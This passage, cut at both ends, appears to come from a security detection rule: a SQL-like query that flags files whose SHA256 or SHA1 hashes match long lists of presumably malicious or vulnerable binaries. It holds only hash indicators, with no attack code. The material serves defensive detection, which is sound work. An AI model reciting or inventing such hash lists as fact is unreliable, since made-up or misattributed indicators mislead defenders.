'%SHA256=19a212e6fc324f4cb9ee5eba60f5c1fc0191799a4432265cbeaa3307c76a7fc0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a7c8f4faf3cbb088cac7753d81f8ec4c38ccb97cd9da817741f49272e8d01200%' ESCAPE '\\' OR Hashes LIKE '%SHA256=677c0b1add3990fad51f492553d3533115c50a242a919437ccb145943011d2bf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fc22977ff721b3d718b71c42440ee2d8a144f3fbc7755e4331ddd5bcc65158d2%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=ad40e6d0f77c0e579fb87c5106bf6de3d1a9f30ee2fbf8c9c011f377fa05f173%' ESCAPE '\\' OR Hashes LIKE '%SHA256=18e1707b319c279c7e0204074088cc39286007a1cf6cb6e269d5067d8d0628c6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c9cf1d627078f63a36bbde364cd0d5f2be1714124d186c06db5bcdf549a109f8%' ESCAPE '\\' OR Hashes LIKE '%SHA256=afdd66562dea51001c3a9de300f91fc3eb965d6848dfce92ccb9b75853e02508%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a899b659b08fbae30b182443be8ffb6a6471c1d0497b52293061754886a937a3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1963d5a0e512b72353953aadbe694f73a9a576f0241a988378fa40bf574eda52%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7133a461aeb03b4d69d43f3d26cd1a9e3ee01694e97a0645a3d8aa1a44c39129%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32e1a8513eee746d17eb5402fb9d8ff9507fb6e1238e7ff06f7a5c50ff3df993%' ESCAPE '\\' OR Hashes LIKE '%SHA256=082c39fe2e3217004206535e271ebd45c11eb072efde4cc9885b25ba5c39f91d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=65329dad28e92f4bcc64de15c552b6ef424494028b18875b7dba840053bc0cdd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f8430bdc6fd01f42217d66d87a3ef6f66cb2700ebb39c4f25c8b851858cc4b35%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9f1229cd8dd9092c27a01f5d56e3c0d59c2bb9f0139abf042e56f343637fda33%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b03f26009de2e8eabfcf6152f49b02a55c5e5d0f73e01d48f5a745f93ce93a29%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3943a796cc7c5352aa57ccf544295bfd6fb69aae147bc8235a00202dc6ed6838%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3c5bf92c26398695f9ced7ce647a7e9f6ddcc89eea66b45aa3607196a187431b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=478917514be37b32d5ccf76e4009f6f952f39f5553953544f1b0688befd95e82%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4ed2d2c1b00e87b926fb58b4ea43d2db35e5912975f4400aa7bd9f8c239d08b7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=b205835b818d8a50903cf76936fcf8160060762725bd74a523320cfbd091c038%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ab8f2217e59319b88080e052782e559a706fa4fb7b8b708f709ff3617124da89%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=73327429c505d8c5fd690a8ec019ed4fd5a726b607cabe71509111c7bfe9fc7e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=87e38e7aeaaaa96efe1a74f59fca8371de93544b7af22862eb0e574cec49c7c3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2270a8144dabaf159c2888519b11b61e5e13acdaa997820c09798137bded3dd6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=43ba8d96d5e8e54cab59d82d495eeca730eeb16e4743ed134cdd495c51a4fc89%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e1980c6592e6d2d92c1a65acad8f1071b6a404097bb6fcce494f3c8ac31385cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1dadd707c55413a16320dc70d2ca7784b94c6658331a753b3424ae696c5d93ea%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d84e3e250a86227c64a96f6d5ac2b447674ba93d399160850acb2339da43eae5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5ae23f1fcf3fb735fcf1fa27f27e610d9945d668a149c7b7b0c84ffd6409d99a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0f726d8ce21c0c9e01ebe6b55913c519ad6086bcaec1a89f8308f3effacd435f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=95d50c69cdbf10c9c9d61e64fe864ac91e6f6caa637d128eb20e1d3510e776d3%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0e14a4401011a9f4e444028ac5b1595da34bbbf9af04a00670f15ff839734003%' ESCAPE '\\' OR Hashes LIKE '%SHA256=26c86227d3f387897c1efd77dc711eef748eb90be84149cb306e3d4c45cc71c7%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42d926cfb3794f9b1e3cb397498696cb687f505e15feb9df11b419c49c9af498%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1684e24dae20ab83ab5462aa1ff6473110ec53f52a32cfb8c1fe95a2642c6d22%' ESCAPE '\\' OR Hashes LIKE '%SHA256=9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=440883cd9d6a76db5e53517d0ec7fe13d5a50d2f6a7f91ecfc863bc3490e4f5c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e05eeb2b8c18ad2cb2d1038c043d770a0d51b96b748bc34be3e7fc6f3790ce53%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3a364a7a3f6c0f2f925a060e84fb18b16c118125165b5ea6c94363221dc1b6de%' ESCAPE '\\' OR Hashes LIKE '%SHA256=fda506e2aa85dc41a4cbc23d3ecc71ab34e06f1def736e58862dc449acbc2330%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=3ac5e01689a3d745e60925bc7faca8d4306ae693e803b5e19c94906dc30add46%' ESCAPE '\\' OR Hashes LIKE '%SHA256=175eed7a4c6de9c3156c7ae16ae85c554959ec350f1c8aaa6dfe8c7e99de3347%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8596ea3952d84eeef8f5dc5b0b83014feb101ec295b2d80910f21508a95aa026%' ESCAPE '\\' OR Hashes LIKE '%SHA256=52a90fd1546c068b92add52c29fbb8a87d472a57e609146bbcb34862f9dcec15%' ESCAPE '\\' OR Hashes LIKE '%SHA256=543991ca8d1c65113dff039b85ae3f9a87f503daec30f46929fd454bc57e5a91%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e75714f8e0ff45605f6fc7689a1a89c7dcd34aab66c6131c63fefaca584539cf%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1aaa9aef39cb3c0a854ecb4ca7d3b213458f302025e0ec5bfbdef973cca9111c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=cc687fe3741bbde1dd142eac0ef59fd1d4457daee43cdde23bb162ef28d04e64%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3ed15a390d8dfbd8a8fb99e8367e19bfd1cced0e629dfe43ccdb46c863394b59%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8c95d28270a4a314299cf50f05dcbe63033b2a555195d2ad2f678e09e00393e6%' ESCAPE '\\' OR Hashes LIKE '%SHA256=eea53103e7a5a55dc1df79797395a2a3e96123ebd71cdd2db4b1be80e7b3f02b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=37c637a74bf20d7630281581a8fae124200920df11ad7cd68c14c26cc12c5ec9%' ESCAPE '\\' OR Hashes LIKE '%SHA256=32cccc4f249499061c0afa18f534c825d01034a1f6815f5506bf4c4ff55d1351%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c5050a2017490fff7aa53c73755982b339ddb0fd7cef2cde32c81bc9834331c5%' ESCAPE '\\' OR Hashes LIKE '%SHA256=ff803017d1acafde6149fe7d463aee23b1c4f6f3b97c698c05f3ca6f07e4df6c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=000547560fea0dd4b477eb28bf781ea67bf83c748945ce8923f90fdd14eb7a4b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0af5ccb3d33a9ba92071c9637be6254030d61998733a5eb3583e865e17844e05%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a13054f349b7baa8c8a3fcbd31789807a493cc52224bbff5e412eb2bd52a6433%' ESCAPE '\\' OR Hashes LIKE '%SHA256=da6ca1fb539f825ca0f012ed6976baf57ef9c70143b7a1e88b4650bf7a925e24%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=9c2977d63faa340b03e1bbfb8a6db19c0adfa60ff6579b888ece10022c94c3ec%' ESCAPE '\\' OR Hashes LIKE '%SHA256=771a8d05f1af6214e0ef0886662be500ee910ab99f0154227067fddcfe08a3dd%' ESCAPE '\\' OR Hashes LIKE '%SHA256=927c2a580d51a598177fa54c65e9d2610f5f212f1b6cb2fbf2740b64368f010a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=42851a01469ba97cdc38939b10cf9ea13237aa1f6c37b1ac84904c5a12a81fa0%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e6db8a1c9d82d18b948c7135439fdeaa9bc02ea97509e3534de65e5481489220%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1062211314088012edb9fe65780e35e7b3144ac45021269fc993ef2931c8584b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=029dbf6d8dc920a32b3c7a2057513d3741b20b7f6e7aa23b113859a8049214df%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1d053020079124ac526d84affb17bf4a1563ecd872c83b4b6299c9aa6a732557%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c059f1b2b73ecab48d62f469d48dbde74a80c4ada07f0bd3b417ec4e044fb522%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a66d2fb7ef7350ea74d4290c57fb62bc59c6ea93f759d4ca93c3febca7aeb512%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5d712d3fad791bdc67502ed7c6586ca39d12ae26c7b245c36effec92e3cda08e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=e61004335dfe7349f2b2252baa1e111fb47c0f2d6c78a060502b6fcc92f801e4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=7c0f77d103015fc29379ba75d133dc3450d557b0ba1f7495c6b43447abdae230%' ESCAPE '\\' OR Hashes LIKE '%SHA256=97363f377aaf3c01641ac04a15714acbec978afb1219ac8f22c7e5df7f2b2d56%' ESCAPE '\\' OR Hashes LIKE '%SHA256=8e6363a6393eb4234667c6f614b2072e33512866b3204f8395bbe01530d63f2f%' ESCAPE '\\' OR Hashes LIKE '%SHA256=09b0e07af8b17db1d896b78da4dd3f55db76738ee1f4ced083a97d737334a184%' ESCAPE '\\' OR Hashes LIKE '%SHA256=2a4f4400402cdc475d39389645ca825bb0e775c3ecb7c527e30c5be44e24af7d%' ESCAPE '\\' OR Hashes LIKE '%SHA256=5f69d6b167a1eeca3f6ac64785c3c01976ee7303171faf998d65852056988683%' ESCAPE '\\' OR Hashes LIKE '%SHA256=f877296e8506e6a1acbdacdc5085b18c6842320a2775a329d286bac796f08d54%' ESCAPE '\\' OR Hashes LIKE 
'%SHA256=2d2c7ee9547738a8a676ab785c151e8b48ed40fe7cf6174650814c7f5f58513b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=1ae328c88cf49072c125f41b16c2a2063203b21164245e2850ca491bdd4a522e%' ESCAPE '\\' OR Hashes LIKE '%SHA256=84b4e202c6ce1b08cda1b5e7cd3c3b073155120d80141b2055a1a98a4a18dc42%' ESCAPE '\\' OR Hashes LIKE '%SHA256=0ea78cb430fbf8ef4c9f3d1eadf2b057939081b1367bc6610e918fa3c6d8920c%' ESCAPE '\\' OR Hashes LIKE '%SHA256=a2571531c6b384003bad06003be01e75fcd489b7b2d04c3d072b10f08f50b33b%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4d07f9ecd2540218194874427155a4dc82613574672b55257a321f80e7c9f219%' ESCAPE '\\' OR Hashes LIKE '%SHA256=6d14ae56e140c02f5d1e6df5351b87ac0f4b7e9dc5a3d778a1e399cb7878802a%' ESCAPE '\\' OR Hashes LIKE '%SHA256=c4310708ee81058286be30db1b1d93deab62a37eaa7974750a7ffbe798eed747%' ESCAPE '\\' OR Hashes LIKE '%SHA256=d3d88be19bbb889af859c6189b0750a4e527891f95b0dd2e33cb987ec9784f34%' ESCAPE '\\' OR Hashes LIKE '%SHA256=3313e8d7f276a48fbc9cbdb5bcd013fd79a674da6638327c6342a5c5a3bfa893%' ESCAPE '\\') OR sha1 IN ('2261198385d62d2117f50f631652eded0ecc71db', '8db869c0674221a2d3280143cbb0807fac08e0cc', '27d3ebea7655a72e6e8b95053753a25db944ec0f', '33cdab3bbc8b3adce4067a1b042778607dce2acd', '21e6c104fe9731c874fab5c9560c929b2857b918', 'd979353d04bf65cc92ad3412605bc81edbb75ec2', '2f991435a6f58e25c103a657d24ed892b99690b8', 'f02af84393e9627ba808d4159841854a6601cf80', 'bb962c9a8dda93e94fef504c4159de881e4706fe', 'b97a8d506be2e7eaa4385f70c009b22adbd071ba', '92f251358b3fe86fd5e7aa9b17330afa0d64a705', '8b6aa5b2bff44766ef7afbe095966a71bc4183fa', 'af6e1f2cfb230907476e8b2d676129b6d6657124', 'fcde5275ee1913509927ce5f0f85e6681064c9d2', '00a442a4305c62cefa8105c0b4c4a9a5f4d1e93b', '6523b3fd87de39eb5db1332e4523ce99556077dc', '72966ca845759d239d09da0de7eebe3abe86fee3', '57511ef5ff8162a9d793071b5bf7ebe8371759de', '2d503a2457a787014a1fdd48a2ece2e6cbe98ea7', '400f833dcc2ef0a122dd0e0b1ec4ec929340d90e', '89cd760e8cb19d29ee08c430fb17a5fd4455c741', '1d0df45ee3fa758f0470e055915004e6eae54c95', 
'd5fd9fe10405c4f90235e583526164cd0902ed86', 'c52cef5b9e1d4a78431b7af56a6fdb6aa1bcad65', '609fa1efcf61e26d64a5ceb13b044175ab2b3a13', '7d7c03e22049a725ace2a9812c72b53a66c2548b', 'f9519d033d75e1ab6b82b2e156eafe9607edbcfb', '468e2e5505a3d924b14fedee4ddf240d09393776', '2e3de9bff43d7712707ef8a0b10f7e4ad8427fd8', 'c9cbfdd0be7b35751a017ec59ff7237ffdc4df1f', '078ae07dec258db4376d5a2a05b9b508d68c0123', '623cd2abef6c92255f79cbbd3309cb59176771da', '1f3a9265963b660392c4053329eb9436deeed339', '4a235f0b84ff615e2879fa9e0ec0d745fcfdaa5c', 'ace6b9e34e3e2e73fe584f3bbdb4e4ec106e0a7d', '4268f30b79ce125a81d0d588bef0d4e2ad409bbb', 'c834c4931b074665d56ccab437dfcc326649d612', '8f5cd4a56e6e15935491aa40adb1ecad61eafe7c', '51b60eaa228458dee605430aae1bc26f3fc62325', '3270720a066492b046d7180ca6e60602c764cac7', '2a6e6bd51c7062ad24c02a4d2c1b5e948908d131', '19bd488fe54b011f387e8c5d202a70019a204adf', 'a6fe4f30ca7cb94d74bc6d42cdd09a136056952e', 'ea877092d57373cb466b44e7dbcad4ce9a547344', '205c69f078a563f54f4c0da2d02a25e284370251', 'f9feb60b23ca69072ce42264cd821fe588a186a6', 'b25170e09c9fb7c0599bfba3cf617187f6a733ac', '160c96b5e5db8c96b821895582b501e3c2d5d6e7', 'a2e0b3162cfa336cd4ab40a2acc95abe7dc53843', '4e826430a1389032f3fe06e2cc292f643fb0c417', '7ab4565ba24268f0adadb03a5506d4eb1dc7c181', 'dc7b022f8bd149efbcb2204a48dce75c72633526', '0307d76750dd98d707c699aee3b626643afb6936', '5711c88e9e64e45b8fc4b90ab6f2dd6437dc5a8a', '6714380bc0b8ab09b9a0d2fa66d1b025b646b946', '8626ab1da6bfbdf61bd327eb944b39fd9df33d1d', '30a224b22592d952fbe2e6ad97eda4a8f2c734e0', 'c95db1e82619fb16f8eec9a8209b7b0e853a4ebe', 'fe1d909ab38de1389a2a48352fd1c8415fd2eab0', 'b4d1554ec19504215d27de0758e13c35ddd6db3e', '5dd2c31c4357a8b76db095364952b3d0e3935e1d', 'ecb4d096a9c58643b02f328d2c7742a38e017cf0', '4a705af959af61bad48ef7579f839cb5ebd654d2', 'd2e6fc9259420f0c9b6b1769be3b1f63eb36dc57', 'c948ae14761095e4d76b55d9de86412258be7afd', 'ddbe809b731a0962e404a045ab9e65a0b64917ad', '745bad097052134548fe159f158c04be5616afc2', 
'8d59fd14a445c8f3f0f7991fa6cd717d466b3754', '2dfcb799b3c42ecb0472e27c19b24ac7532775ce', 'cc51be79ae56bc97211f6b73cc905c3492da8f9d', 'ac13941f436139b909d105ad55637e1308f49d9a', '2b0bb408ff0e66bcdf6574f1ca52cbf4015b257b', 'cc0e0440adc058615e31e8a52372abadf658e6b1', '5520ac25d81550a255dc16a0bb89d4b275f6f809', '6afc6b04cf73dd461e4a4956365f25c1f1162387', '4b009e91bae8d27b160dc195f10c095f8a2441e1', '6003184788cd3d2fc624ca801df291ccc4e225ee', '0466e90bf0e83b776ca8716e01d35a8a2e5f96d3', 'e6305dddd06490d7f87e3b06d09e9d4c1c643af0', '89909fa481ff67d7449ee90d24c167b17b0612f1', 'd7e8aef8c8feb87ce722c0b9abf34a7e6bab6eb4', '5e6ddd2b39a3de0016385cbd7aa50e49451e376d', '976777d39d73034df6b113dfce1aa6e1d00ffcfd', '9c6749fc6c1127f8788bff70e0ce9062959637c9', '53acd4d9e7ba0b1056cf52af0d191f226eddf312', '3abb9d0a9d600200ae19c706e570465ef0a15643', '27eab595ec403580236e04101172247c4f5d5426', '78b9481607ca6f3a80b4515c432ddfe6550b18a8', '414cd15d6c991d19fb5be02e3b9fb0e6c5ce731c', 'd9c09dd725bc7bc3c19b4db37866015817a516ef', '9c256edd10823ca76c0443a330e523027b70522d', '35829e096a15e559fcbabf3441d99e580ca3b26e', 'b8de3a1aeeda9deea43e3f768071125851c85bd0', '054a50293c7b4eea064c91ef59cf120d8100f237', 'd94f2fb3198e14bfe69b44fb9f00f2551f7248b2', '01a578a3a39697c4de8e3dab04dba55a4c35163e', '14bf0eaa90e012169745b3e30c281a327751e316', 'f50c6b84dfb8f2d53ba3bce000a55f0a486c0e79', '6100eb82a25d64a7a7702e94c2b21333bc15bd08', 'bf87e32a651bdfd9b9244a8cf24fca0e459eb614', '28b1c0b91eb6afd2d26b239c9f93beb053867a1a', '879fcc6795cebe67718388228e715c470de87dca', '1f7501e01d84a2297c85cb39880ec4e40ac3fe8a', '152b6bb9ffd2ffec00cc46f5c6e29362d0e66e67', '5f8356ffa8201f338dd2ea979eb47881a6db9f03', 'a7bd05de737f8ea57857f1e0845a25677df01872', 'cce9b82f01ec68f450f5fe4312f40d929c6a506e', 'e35a2b009d54e1a0b231d8a276251f64231b66a3', '37364cb5f5cefd68e5eca56f95c0ab4aff43afcc', 'd62fa51e520022483bdc5847141658de689c0c29', '93aa3bb934b74160446df3a47fa085fd7f3a6be9', 'ec4cc6de4c779bb1ca1dd32ee3a03f7e8d633a9b', 
'35f1ba60ba0da8512a0b1b15ee8e30fe240d77cd', '3805e4e08ad342d224973ecdade8b00c40ed31be', '65d8a7c2e867b22d1c14592b020c548dd0665646', 'c8d87f3cd34c572870e63a696cf771580e6ea81b', 'c4d7fb9db3c3459f7e8c0e3d48c95c7c9c4cff60', 'd34a7c497c603f3f7fcad546dc4097c2da17c430', '1fd7f881ea4a1dbb5c9aeb9e7ad659a85421745b', '0b8b83f245d94107cb802a285e6529161d9a834d', 'c969f1f73922fd95db1992a5b552fbc488366a40', 'ac600a2bc06b312d92e649b7b55e3e91e9d63451', 'da9cea92f996f938f699902482ac5313d5e8b28e', '33285b2e97a0aeb317166cce91f6733cf9c1ad53', '21edff2937eb5cd6f6b0acb7ee5247681f624260', 'f052dc35b74a1a6246842fbb35eb481577537826', 'f0c463d29a5914b01e4607889094f1b7d95e7aaf', '0c26ab1299adcd9a385b541ef1653728270aa23e', 'f36a47edfacd85e0c6d4d22133dd386aee4eec15', '460008b1ffd31792a6deadfa6280fb2a30c8a5d2', '738b7918d85e5cb4395df9e3f6fc94ddad90e939', '43419df1f9a07430a18c5f3b3cc74de621be0f8e', '558aad879b6a47d94a968f39d0a4e3a3aaef1ef1', '7fb52290883a6b69a96d480f2867643396727e83', 'f5696fb352a3fbd14fb1a89ad21a71776027f9ab', '693a2645c28fc3b248fda95179c36c3ac64f6fc2', '05c0c49e8bcf11b883d41441ce87a2ee7a3aba1d', 'd25340ae8e92a6d29f599fef426a2bc1b5217299', '7c1b25518dee1e30b5a6eaa1ea8e4a3780c24d0c', 'fe10018af723986db50701c8532df5ed98b17c39', 'bfe55cacc7c56c9f7bd75bdb4b352c0b745d071b', 'a21c84c6bf2e21d69fa06daaf19b4cc34b589347', '82ba5513c33e056c3f54152c8555abf555f3e745', 'd098600152e5ee6a8238d414d2a77a34da8afaaa', '64e4ac8b9ea2f050933b7ec76a55dd04e97773b4', 'bbc1e5fd826961d93b76abd161314cb3592c4436', '90a76945fd2fa45fab2b7bcfdaf6563595f94891', 'b03b1996a40bfea72e4584b82f6b845c503a9748', 'c771ea59f075170e952c393cfd6fc784b265027c', 'cb44c6f0ee51cb4c5836499bc61dd6c1fbdf8aa1', '0918277fcdc64a9dc51c04324377b3468fa1269b', 'b09bcc042d60d2f4c0d08284818ed198cededa04', '8dc2097a90eb7e9d6ee31a7c7a95e7a0b2093b89', '15df139494d2c40a645fb010908551185c27f3c5', '012db3a80faf1f7f727b538cbe5d94064e7159de', 'd04e5db5b6c848a29732bfd52029001f23c3da75', '490109fa6739f114651f4199196c5121d1c6bdf2', 
'b4d014b5edd6e19ce0e8395a64faedf49688ecb5', 'a87d6eac2d70a3fbc04e59412326b28001c179de', '3f223581409492172a1e875f130f3485b90fbe5f', '5db61d00a001fd493591dc919f69b14713889fc5', '9923c8f1e565a05b3c738d283cf5c0ed61a0b90f', '15d1a6a904c8409fb47a82aefa42f8c3c7d8c370', '9d07df024ec457168bf0be7e0009619f6ac4f13c', '9a35ae9a1f95ce4be64adc604c80079173e4a676', 'c6bd965300f07012d1b651a9b8776028c45b149a', 'e83458c4a6383223759cd8024e60c17be4e7c85f', 'cb3de54667548a5c9abf5d8fa47db4097fcee9f1', '9c24dd75e4074041dbe03bf21f050c77d748b8e9', 'dc55217b6043d819eadebd423ff07704ee103231', 'e92817a8744ebc4e4fa5383cdce2b2977f01ecd4', 'dc0e97adb756c0f30b41840a59b85218cbdd198f', '26c4a7b392d7e7bd7f0a2a758534e45c0d9a56ab', 'd0d39e1061f30946141b6ecfa0957f8cc3ddeb63', 'c6d349823bbb1f5b44bae91357895dba653c5861', 'f42f28d164205d9f6dab9317c9fecad54c38d5d2', 'bbc0b9fd67c8f4cefa3d76fcb29ff3cef996b825', '8183a341ba6c3ce1948bf9be49ab5320e0ee324d', 'eb1ecad3d37bb980f908bf1a912415cff32e79e6', 'eb0d45aa6f537f5b2f90f3ad99013606eafcd162', '6053d258096bccb07cb0057d700fe05233ab1fbb', '29a190727140f40cea9514a6420f5a195e36386b', 'a4b2c56c12799855162ca3b004b4b2078c6ecf77', '7667b72471689151e176baeba4e1cd9cd006a09a', 'd7f7594ff084201c0d9fa2f4ef1626635b67bce5', '99201c9555e5faf6e8d82da793b148311f8aa4b8', '947db58d6f36a8df9fa2a1057f3a7f653ccbc42e', '6a3d3b9ab3d201cd6b0316a7f9c3fb4d34d0f403', 'd702d88b12233be9413446c445f22fda4a92a1d9', '910cb12aa49e9f35ecc4907e8304adf0dcca8cf1', '643383938d5e0d4fd30d302af3e9293a4798e392', 'c4ed28fdfba7b8a8dfe39e591006f25d39990f07', 'b0032b8d8e6f4bd19a31619ce38d8e010f29a816', 'db6245578ec57bd767b27ecf8085095e1c8e5a6e', '166759fd511613414d3213942fe2575b926a6226', '02a8b74899591da7b7f49c0450328d39b939d7e4', '98ceed786f79288becc08c3b82c57e8d4bfa1bca', 'f6b3577ea4b1a5641ae3421151a26268434c3db8', '4de33d03fee52f396a1c788000ca868d56ac30de', 'c6920171fa6dff2c17eb83befb5fd28e8dddf5f0', 'fbc6d2448739ddec35bb5d6c94b46df4148f648d', '6b54f8f137778c1391285fee6150dfa58a8120b1', 
'943593e880b4d340f2548548e6e673ef6f61eed3', '5ac4d0e2381fc4a8aebe94a0fb6fe5e7558e4dcd', 'e44297a2b750ec1958bef265e2f1ae6fa4323b28', 'aa2ea973bb248b18973e57339307cfb8d309f687', '3a5d176c50f97b71d139767ed795d178623f491d', '25d812a5ece19ea375178ef9d60415841087726e', '3795e32592ab6d8074b6f7ad33759c6a39b0df07', 'fc121ed6fb37e97a004b6faf217435b772dfc4c0', 'ab2b8602e4baef828b58b995d0889a8e5b8dbd02', 'cf040040628b58f4a811f98c2690913c1e8e4e3c', '3296844d22c87dd5eba3aa378a8242b41d59db7a', 'bc47e15537fa7c32dfefd23168d7e1741f8477ed', 'cb22723faa5ae2809476e5c5e9b9a597b26cab9b', 'f3c5e723ae009b336cd2719137b8cd194c9ee51d', '41f2d0f9863bce8920c207b1ef5d3d32b603edef', 'eb93d2f564fea9b3dc350f386b45de2cd9a3e001', '3cd037fbba8aae82c1b111c9f8755349c98bcb3c', '9401389fba314d1810f83edce33c37e84a78e112', '7eb34cc1fcffb4fdb5cb7e97184dd64a65cb9371', '16d7ecf09fc98798a6170e4cef2745e0bee3f5c7', 'fcd615df88645d1f57ff5702bd6758b77efea6d0', 'f3db629cfe37a73144d5258e64d9dd8b38084cf4', 'a00e444120449e35641d58e62ed64bb9c9f518d2', '38571f14fc014487194d1eecfa80561ee8644e09', '4d41248078181c7f61e6e4906aa96bbdea320dc2', '3599ea2ac1fa78f423423a4cf90106ea0938dde8', '3d6d53b0f1cc908b898610227b9f1b9352137aba', '4c18754dca481f107f0923fb8ef5e149d128525d', '8c377ab4eebc5f4d8dd7bb3f90c0187dfdd3349f', 'cde32654a041fedc7b0fa1083f6005b950760062', '5fb9421be8a8b08ec395d05e00fd45eb753b593a', 'b480c54391a2a2f917a44f91a5e9e4590648b332', '4f7a8e26a97980544be634b26899afbefb0a833c', 'c1d5cf8c43e7679b782630e93f5e6420ca1749a7', 'a7e9a4686aa7291331e2c8708882c8d81d05264f', '7ba19a701c8af76988006d616a5f77484c13cb0a', '4243dbbf6e5719d723f24d0f862afd0fcb40bc35', '00b4e8b7644d1bf93f5ddb5740b444b445e81b02', 'fd833f3fe2fa396878033b9e6054725248bf9881', 'db446af0e34259e95f4db112a9f06177e1eef4e0', '39d7b121bc654a0de891225e0f8b7b5537c24931', 'd0a228ed8af190dec0c1a812e212f5e68ee3b43e', '7d2fc1a6729521e5c76f659e4c398e2061f7ed5e', 'f999709e5b00a68a0f4fa912619fe6548ad0c42d', '06232f7ea7ea24102d452427aedbbc8b8e188a0c', 
'a380aeb3ffaecc53ca48bb1d4d622c46f1de7962', '4927d843577bada119a17b249ff4e7f5e9983a92', 'e5114fd50904c7fb75d8c86367b9a2dd4f79dfb1', '3ccf1f3ac636a5e21b39ede48ff49fa23e05413f', '755349d56cdd668ca22eebc4fc89f0cccef47327', '56af49e030eb85528e82849d7d1b6147f3c4973e', '45a9f95a7a018925148152b888d09d478d56bbf5', '540b9f9a232b9d597138b8e0f33d83f5f6e247af', 'bdfb25cc4ed569dc0d5849545eb4abe08539029f', '28da2ac7c82b999c53f99d55331cfa3624a0bc6f', '5d5f92fba0f39826b527f335a7cca7d363758410', '1858ab7ad1947f5c24b9c913cd975e6dbb536865', '0f2aa3bfdfd699e258382ea1b3c1db1ad7211023', '886a9c16b871da42cdb54c6738a8e088be8b989f', 'c24883645c0589f6171e8ee10080750ac66d75e6', '36d3b09e19477d807a6a5efff89aa6cc8b71bdeb', 'e58dd758e28218e1edb33cd88bb97504972ee221', 'd782ef79266179d2247807857877fabb2e402be5') OR sha256 IN ('04A85E359525D662338CAE86C1E59B1D7AA9BD12B920E8067503723DC1E03162', '05F052C64D192CF69A462A5EC16DDA0D43CA5D0245900C9FCB9201685A2E7748', '4045AE77859B1DBF13972451972EAAF6F3C97BEA423E9E78F1C2F14330CD47CA', '6948480954137987A0BE626C24CF594390960242CD75F094CD6AAA5C2E7A54FA', '8CB62C5D41148DE416014F80BD1FD033FD4D2BD504CB05B90EEB6992A382D58F', 'B1D96233235A62DBB21B8DBE2D1AE333199669F67664B107BFF1AD49B41D9414', '7196187FB1EF8D108B380D37B2AF8EFDEB3CA1F6EEFD37B5DC114C609147216D', '7F375639A0DF7FE51E5518CF87C3F513C55BC117DB47D28DA8C615642EB18BFA', '42579A759F3F95F20A2C51D5AC2047A2662A2675B3FB9F46C1ED7F23393A0F00', '2DA330A2088409EFC351118445A824F11EDBE51CF3D653B298053785097FE40E', '436CCAB6F62FA2D29827916E054ADE7ACAE485B3DE1D3E5C6C62D3DEBF1480E7', 'B4D47EA790920A4531E3DF5A4B4B0721B7FEA6B49A35679F0652F1E590422602', 'DDE6F28B3F7F2ABBEE59D4864435108791631E9CB4CDFB1F178E5AA9859956D8', 'B48A309EE0960DA3CAAAAF1E794E8C409993AEB3A2B64809F36B97AAC8A1E62A', '025E7BE9FCEFD6A83F4471BBA0C11F1C11BD5047047D26626DA24EE9A419CDC4', '2AA1B08F47FBB1E2BD2E4A492F5D616968E703E1359A921F62B38B8E4662F0C4', 'ECE0A900EA089E730741499614C0917432246CEB5E11599EE3A1BB679E24FD2C', 
